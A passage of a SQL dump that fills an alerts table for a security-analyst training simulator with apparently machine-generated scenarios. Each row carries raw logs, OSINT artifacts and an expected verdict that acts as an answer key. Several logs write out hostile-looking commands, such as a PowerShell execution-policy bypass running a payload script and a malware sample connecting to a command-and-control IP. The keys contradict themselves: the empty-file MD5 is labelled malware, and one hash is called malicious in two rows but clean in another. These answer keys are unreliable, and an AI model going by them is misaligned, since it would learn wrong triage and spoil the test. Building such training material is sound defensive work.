compromise.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2189, 'Potential False Positive: Executable Detected', 'medium', 'Any.Run', 'An executable was detected running on an employee\'s machine, flagged due to unusual execution patterns, but appears benign.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:45:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"203.0.113.90\",\"username\":\"asmith\",\"hostname\":\"laptop789\",\"command_line\":\"C:\\\\Users\\\\asmith\\\\Documents\\\\benign_tool.exe\",\"file_hash\":\"e2fc714c4727ee9395f324cd2e7f331f\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e2fc714c4727ee9395f324cd2e7f331f\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Hash not associated with known malware\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.90\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"No malicious activity reported\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The executable is a legitimate tool used by the employee, with no malicious indicators.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2190, 'Malicious Macro Execution Detected', 'critical', 'Ghidra', 'A malicious macro was executed, exploiting document vulnerabilities to gain persistence on the network.', 'Malware', 'T1203', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:20:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.50\",\"dst_ip\":\"198.51.100.200\",\"username\":\"kwhite\",\"hostname\":\"desktop456\",\"request_body\":\"Base64: TWFsaWNpb3VzTWFjcm9FeGVjdXRpb24=\",\"command_line\":\"winword.exe /macro MaliciousMacro\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.200\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"IP involved in command and control activities\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"Base64: TWFsaWNpb3VzTWFjcm9FeGVjdXRpb24=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Macro execution attempt detected\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The macro execution indicates an attempt to exploit document vulnerabilities for persistence.\"}', 'Intermediate', 'MAL', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2191, 'Unusual Network Behavior: Internal Traffic Spike', 'medium', 'Cuckoo Sandbox', 'An unexpected spike in internal network traffic was observed, originating from a development server, but analysis shows no malicious intent.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:10:10Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.3.10\",\"dst_ip\":\"192.168.3.55\",\"username\":\"svc_dev\",\"hostname\":\"dev-server01\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.3.55\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The traffic spike was due to a scheduled data migration, not malicious activity.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2192, 'Malware Command and Control Communication', 'critical', 'IDA Pro', 'A suspected malware sample was analyzed, revealing communication with a known command and control server, indicating a potential compromise.', 'Malware', 'T1105', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T15:50:25Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.4.20\",\"dst_ip\":\"203.0.113.155\",\"username\":\"nmartin\",\"hostname\":\"server002\",\"command_line\":\"malware_sample.exe /connect 203.0.113.155\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.4.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.155\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with known command and control servers\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"malware_sample.exe /connect 203.0.113.155\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command indicates communication with C2 server\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The communication with a known malicious IP suggests a compromised host.\"}', 'Intermediate', 'MAL', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2193, 'Malicious Macro Detected in Email Attachment', 'high', 'Proofpoint', 'A macro-enabled document was detected in an email attachment sent from an unknown external domain. The macro attempts to download additional payloads upon execution.', 'Malware', 'T1203', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:15:30Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.77\",\"dst_ip\":\"192.168.1.10\",\"email_sender\":\"attacker@example.com\",\"hostname\":\"victim-pc01\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"command_line\":\"powershell -ExecutionPolicy Bypass -File C:\\\\Users\\\\victim\\\\Downloads\\\\malware.docm\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1123 times for malware distribution\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"attacker@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Email domain associated with phishing campaigns\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected in multiple malware analyses\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The macro-enabled document is designed to execute upon opening, attempting to establish a connection to an external IP for further payload download.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2194, 'Suspicious Network Connection from Internal Machine', 'medium', 'Cuckoo Sandbox', 'An internal machine initiated a network connection to a known Command and Control server. The executable responsible was packed and evaded basic detection.', 'Malware', 'T1105', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:45:12Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.15\",\"dst_ip\":\"198.51.100.23\",\"username\":\"jdoe\",\"hostname\":\"workstation-02\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"command_line\":\"C:\\\\Program Files\\\\malicious.exe\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"IP identified as Command and Control server in recent attacks\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Packed executable observed in various malware campaigns\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The network connection to a known C2 server indicates potential data exfiltration or further command execution.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2195, 'Potential Phishing Email with Suspicious Link', 'medium', 'Proofpoint', 'A suspicious email was received containing a link to a malicious domain impersonating a well-known financial institution.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:12:45Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.66\",\"dst_ip\":\"192.168.3.8\",\"email_sender\":\"no-reply@banksecure.example.com\",\"hostname\":\"user-laptop\",\"url\":\"http://secure-bank-login.example.com/login\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.66\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported multiple times for phishing activities\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://secure-bank-login.example.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL mimics legitimate bank login page to harvest credentials\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email attempts to deceive the user into entering their credentials on a fake login page.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2196, 'Non-Malicious Base64 Encoded Web Request', 'low', 'Any.Run', 'A web request was detected with Base64 encoded content that initially appeared suspicious but decoded to benign activity.', 'Web Attack', 'T1190', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:30:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.168.5.20\",\"dst_ip\":\"203.0.113.45\",\"username\":\"webuser\",\"hostname\":\"webserver-01\",\"request_body\":\"Z2V0IHBhZ2U=\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP not associated with any malicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"Z2V0IHBhZ2U=\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Base64 content decoded to harmless command\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The Base64 content decoded to a harmless command, indicating routine web activity.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2197, 'Unusual Internal IP Communication Flagged as Suspicious', 'medium', 'Ghidra', 'An internal IP communicated with another internal IP on an unusual port, initially flagged as suspicious but determined to be benign after analysis.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"10.0.0.10\",\"username\":\"admin\",\"hostname\":\"server-01\",\"command_line\":\"nc -zv 10.0.0.10 3389\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP conducting routine administrative task\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"nc -zv 10.0.0.10 3389\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command used for legitimate internal network checks\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The internal communication was part of scheduled maintenance and not indicative of lateral movement.\"}', 'Intermediate', 'MAL', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2198, 'Packed Executable Detected via IDA Pro Analysis', 'high', 'IDA Pro', 'A packed executable was detected through reverse engineering with IDA Pro, exhibiting suspicious execution patterns. The executable attempts to establish a network connection to a known malicious IP.', 'Malware', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:32:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.25\",\"dst_ip\":\"198.51.100.45\",\"username\":\"jdoe\",\"hostname\":\"workstation-12\",\"command_line\":\"C:\\\\Windows\\\\temp\\\\suspicious.exe\",\"file_hash\":\"3b5d5c3712955042212316173ccf37be\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 947 times for malware distribution\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3b5d5c3712955042212316173ccf37be\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with multiple malware signatures\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of a known malicious IP and hash confirms this as a true positive malware attack.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2199, 'Malicious Macro Document Execution via Ghidra', 'critical', 'Ghidra', 'Ghidra identified a document with malicious macros attempting to execute a PowerShell command to download additional payloads.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:45:23Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"203.0.113.75\",\"username\":\"bsmith\",\"hostname\":\"laptop-09\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\bsmith\\\\AppData\\\\Local\\\\Temp\\\\malicious.ps1\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"IP linked to command and control infrastructure\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash recognized as part of a known malware campaign\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal client IP address\"}},{\"id\":\"artifact_4\",\"type\":\"command\",\"value\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\bsmith\\\\AppData\\\\Local\\\\Temp\\\\malicious.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"PowerShell command used for downloading additional payloads\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Confirmed malicious activity due to the execution of a known bad hash and malicious 
PowerShell command.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2200, 'Suspicious Network Connection Detected by Any.Run', 'medium', 'Any.Run', 'A network connection from an internal machine to a suspicious external IP was detected. Further investigation revealed benign software activity.', 'Network Anomaly', 'T1049', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:12:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.10\",\"dst_ip\":\"203.0.113.100\",\"username\":\"csmith\",\"hostname\":\"desktop-01\",\"command_line\":\"outbound connection to 203.0.113.100:443\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP occasionally flagged for unusual traffic patterns\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.2.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address originating the connection\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_anomaly\",\"analysis_notes\":\"The connection was part of a legitimate software update process, not malicious activity.\"}', 'Intermediate', 'MAL', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2201, 'Malware Analysis via Cuckoo Sandbox', 'critical', 'Cuckoo Sandbox', 'A file submitted to Cuckoo Sandbox exhibited multiple malicious behaviors, including persistence mechanisms and data exfiltration attempts.', 'Malware', 'T1055', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:05:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"203.0.113.50\",\"username\":\"admin\",\"hostname\":\"server-05\",\"command_line\":\"C:\\\\malicious\\\\run.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP known for hosting malware\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Hash found in malware database with multiple detections\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network address indicating victim machine\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The sandbox analysis confirmed malicious behaviors typical of malware, including persistence and communication with a known malicious IP.\"}', 'Intermediate', 'MAL', 5, 1, 'OT_ICS', NULL, NULL, NULL, 0),
(2202, 'Suspicious Web Request Detected by Any.Run', 'low', 'Any.Run', 'A web request from an internal IP seemed suspicious but was identified as a legitimate user action after further inspection.', 'Web Anomaly', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:55:10Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.168.0.5\",\"dst_ip\":\"198.51.100.20\",\"username\":\"jdoe\",\"hostname\":\"terminal-03\",\"request_body\":\"GET /index.php?user=jdoe&action=login\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"IP associated with trusted service provider\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the user machine\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"GET /index.php?user=jdoe&action=login\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Normal web request pattern\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"web_anomaly\",\"analysis_notes\":\"The web request was validated as a standard login attempt by the user.\"}', 'Intermediate', 'MAL', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2203, 'Packed Executable Detected with Reverse Engineering Tools', 'high', 'IDA Pro', 'A packed executable was analyzed, revealing suspicious behavior indicative of malware execution. The executable attempts to persist using startup entries.', 'Malware', 'T1036', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"workstation-01\",\"command_line\":\"C:\\\\Temp\\\\malicious.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with multiple malware families\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\Temp\\\\malicious.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable uses process hollowing to evade detection\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The executable is confirmed malicious due to its behavior and known bad hash.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2204, 'Malicious Macro Execution Detected', 'critical', 'Ghidra', 'A Word document containing a malicious macro was executed. The macro attempted to download additional payloads from a known malicious domain.', 'Malware', 'T1204', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"198.51.100.10\",\"username\":\"asmith\",\"hostname\":\"workstation-02\",\"command_line\":\"winword.exe /macro\",\"domain\":\"malicious-domain.com\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"malicious-domain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain involved in distributing malware\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"winword.exe /macro\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Macro execution attempts to download secondary payloads\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine\"}}],\"expected_actions\":[\"block_domain\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Macro execution from the document led to a connection with a known malicious domain.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2205, 'Suspicious Network Connection During Malware Analysis', 'medium', 'Cuckoo Sandbox', 'A malware sample executed in the sandbox attempted to contact an external IP address known for C2 communications.', 'Malware', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.15\",\"dst_ip\":\"203.0.113.99\",\"username\":\"sandbox_user\",\"hostname\":\"sandbox-machine\",\"file_hash\":\"25f4b8e1b0f94e0a8e7c6a1f9c971e2d\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for C2 communications\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"25f4b8e1b0f94e0a8e7c6a1f9c971e2d\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Sample has few detection flags but is associated with C2 behavior\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address for sandbox environment\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The external IP is known for malicious C2 traffic, confirming the sample\'s malicious nature.\"}', 'Intermediate', 'MAL', 5, 1, 'RETAIL', NULL, NULL, NULL, 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(2206, 'Executable Identified as False Positive in Malware Analysis', 'low', 'Any.Run', 'An executable flagged during the analysis was found to be a legitimate software update mistakenly identified as malicious due to its behavior.', 'Malware', 'T1036', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"\",\"username\":\"bsmith\",\"hostname\":\"workstation-03\",\"command_line\":\"C:\\\\Updates\\\\legit_update.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"File hash corresponds to a legitimate software update\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\Updates\\\\legit_update.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Executable verified as part of a software update\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The executable, although flagged, was confirmed to be a non-malicious software update.\"}', 'Intermediate', 'MAL', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2207, 'Benign Network Traffic Mistaken for C2 Communication', 'medium', 'Cuckoo Sandbox', 'An internal application generated network traffic that resembled C2 communication, but further analysis revealed it was legitimate.', 'Malware', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.75\",\"dst_ip\":\"203.0.113.150\",\"username\":\"jwilson\",\"hostname\":\"server-01\",\"file_hash\":\"3f5c8f7b9d1c8a2c9f8d6a0e7b0f2d1e\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.150\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP occasionally reported, but typically associated with benign 